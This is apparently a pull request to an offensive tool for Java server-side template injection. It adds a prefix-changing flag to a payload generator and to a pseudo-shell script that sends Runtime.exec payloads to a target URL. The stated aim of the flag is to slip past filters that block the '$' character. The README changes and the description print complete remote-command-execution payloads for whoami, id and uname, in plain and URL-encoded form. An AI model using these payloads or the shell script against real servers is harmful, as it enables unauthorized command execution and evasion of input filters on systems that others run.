### PR TITLE
Modifiable Prefix Feature

### DIFF
--- a/README.md
+++ b/README.md
@@ -8,9 +8,9 @@ The string is converted into a decimal value and then concatenated together. Thi
 
 USAGE (help)
 =============
-Use the flag `-h` or `--help` to show the help message.
-The `-u` or `--url-encode` flag is passed to url encode the payload
-The `-p` or `--prefix` flag is used to change the default prefix of the payload, the default is "$"
+Use the flag `-h` or `--help` to show the help message.  
+The `-u` or `--url-encode` flag is passed to url encode the payload  
+The `-p` or `--prefix` flag is used to change the default prefix of the payload, the default is "$"  
 
 Examples are found below;
 

--- a/README.md
+++ b/README.md
@@ -32,6 +32,21 @@ Command ==> id
 Command ==> uname -a
 %24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28117%29.concat%28T%28java.lang.Character%29.toString%28110%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2845%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29%29.getInputStream%28%29%29%7D
 ```
+#### Example 3: (modified prefix) (+with url encoding)
+
+```
+> python3 ssti-payload.py -p '*'
+Command ==> whoami
+*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105))).getInputStream())}
+
+Command ==> id
+*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100))).getInputStream())}
+
+> python3 ssti-payload.py -u -p '#'
+Command ==> uname -a
+%23%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28117%29.concat%28T%28java.lang.Character%29.toString%28110%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2845%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29%29.getInputStream%28%29%29%7D
+
+
 
 SSTI Skeleton
 =============

--- a/README.md
+++ b/README.md
@@ -6,6 +6,29 @@ This generator is for a specific type of Java SSTI, inspired by the following [P
 
 The string is converted into a decimal value and then concatenated together. This python script will automate that process within a interactive Cmd prompt.
 
+USAGE (help)
+=============
+Use the flag `-h` or `--help` to show the help message.
+The `-u` or `--url-encode` flag is passed to url encode the payload
+The `-p` or `--prefix` flag is used to change the default prefix of the payload, the default is "$"
+
+Examples are found below;
+
+SSTI Skeleton
+=============
+
+`ssti-skel.py` uses the `Cmd` library to create a looped command prompt. This directly takes input from the command line, encodes it appropriately, and sends it via `requests` to the target url (`-t`). 
+
+If successful, the script will be a `pseudo-shell`, allowing for commands to be sent in real time. If at anytime a request fails, the script will quit.
+
+This is a very specific usecase. But if it works, it works.
+
+Example command:
+
+```python3 ssti-skel.py -t 'https://example.com/path?param='```
+
+Depending on the response, the `ssti=str(output).split('&#39;')[1].rstrip()` variable will probably have to be changed to suit the response. No clever logic was implemented for this :)
+
 #### Example 1:
 
 ```
@@ -45,22 +68,5 @@ Command ==> id
 > python3 ssti-payload.py -u -p '#'
 Command ==> uname -a
 %23%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28117%29.concat%28T%28java.lang.Character%29.toString%28110%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2845%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29%29.getInputStream%28%29%29%7D
-
-
-
-SSTI Skeleton
-=============
-
-`ssti-skel.py` uses the `Cmd` library to create a looped command prompt. This directly takes input from the command line, encodes it appropriately, and sends it via `requests` to the target url (`-t`). 
-
-If successful, the script will be a `pseudo-shell`, allowing for commands to be sent in real time. If at anytime a request fails, the script will quit.
-
-This is a very specific usecase. But if it works, it works.
-
-Example command:
-
-```python3 ssti-skel.py -t 'https://example.com/path?param='```
-
-Depending on the response, the `ssti=str(output).split('&#39;')[1].rstrip()` variable will probably have to be changed to suit the response. No clever logic was implemented for this :)
-
+```
 

--- a/ssti-payload.py
+++ b/ssti-payload.py
@@ -4,9 +4,11 @@ import urllib.parse, argparse
 
 parser = argparse.ArgumentParser(description="Generate SSTI payloads... One character at a time.")
 parser.add_argument("-u","--url-encode", action="store_true", help="URL Encode")
+parser.add_argument("-p","--prefix", type=ascii, help="Modify Payload Prefix")
 args = parser.parse_args()
 
 url_encode=args.url_encode
+modify_prefix=args.prefix
 
 class Terminal(Cmd):
 	prompt='\033[1;33mCommand ==>\033[0m '
@@ -26,6 +28,8 @@ class Terminal(Cmd):
 			payload+=line
 
 		payload+=').getInputStream())}'
+		if modify_prefix:
+			payload = payload.replace("$", modify_prefix[1:-1], 1)	
 		if url_encode:
 			payload_encoded=urllib.parse.quote_plus(payload,safe='')
 			return payload_encoded

--- a/ssti-payload.py
+++ b/ssti-payload.py
@@ -4,7 +4,7 @@ import urllib.parse, argparse
 
 parser = argparse.ArgumentParser(description="Generate SSTI payloads... One character at a time.")
 parser.add_argument("-u","--url-encode", action="store_true", help="URL Encode")
-parser.add_argument("-p","--prefix", type=ascii, help="Modify Payload Prefix")
+parser.add_argument("-p","--prefix", type=ascii, help="Modify Prefix")
 args = parser.parse_args()
 
 url_encode=args.url_encode

--- a/ssti-skel.py
+++ b/ssti-skel.py
@@ -6,12 +6,13 @@ from time import gmtime, strftime
 parser = argparse.ArgumentParser(description="RCE.")
 parser.add_argument("-t", "--target",metavar="",required=True,help="Target to give an STI")
 parser.add_argument("-u","--url-encode", action="store_true", help="URL Encode")
+parser.add_argument("-p","--prefix", type=ascii, help="Modify Payload Prefix")
 parser.add_argument("-d","--debug", action="store_true",default=False, help="Print debug")
 args = parser.parse_args()
 
-
-url_encode=args.url_encode
 target=args.target
+url_encode=args.url_encode
+modify_prefix=args.prefix
 DEBUG=args.debug
 
 def yellow(string):
@@ -44,6 +45,8 @@ class Terminal(Cmd):
 			payload+=line
 
 		payload+=').getInputStream())}'
+		if modify_prefix:
+			payload = payload.replace("$", modify_prefix[1:-1], 1)		
 		if url_encode:
 			payload_encoded=urllib.parse.quote_plus(payload,safe='')
 			debug('Payload: ',payload_encoded)

--- a/ssti-skel.py
+++ b/ssti-skel.py
@@ -6,7 +6,7 @@ from time import gmtime, strftime
 parser = argparse.ArgumentParser(description="RCE.")
 parser.add_argument("-t", "--target",metavar="",required=True,help="Target to give an STI")
 parser.add_argument("-u","--url-encode", action="store_true", help="URL Encode")
-parser.add_argument("-p","--prefix", type=ascii, help="Modify Payload Prefix")
+parser.add_argument("-p","--prefix", type=ascii, help="Modify Prefix")
 parser.add_argument("-d","--debug", action="store_true",default=False, help="Print debug")
 args = parser.parse_args()
 


### PR DESCRIPTION
Added a feature in which parsing  `-p` or `--prefix` with any ascii character(s) allows to modify the prefix used for the payload.  Updated the README to show examples of the feature and usage.  

This feature works with both the SSTI-Skeleton as well as the payload generator in which the other arguments such as `--url-encode` are still fully functional in conjunction with modifying the prefix.

The use case for this feature is for other variants of Java SSTI that use different prefixes or to bypass filtration systems in which the default "$" character is blocked. (this just happened to me in a CTF :D)

Example of the Feature: 

> python3 ssti-payload.py -p '@'
Command ==> whoami
@{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105))).getInputStream())}

> python3 ssti-payload.py -u -p '#'
Command ==> id
%23%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28105%29.concat%28T%28java.lang.Character%29.toString%28100%29%29%29.getInputStream%28%29%29%7D

*:)* -torry2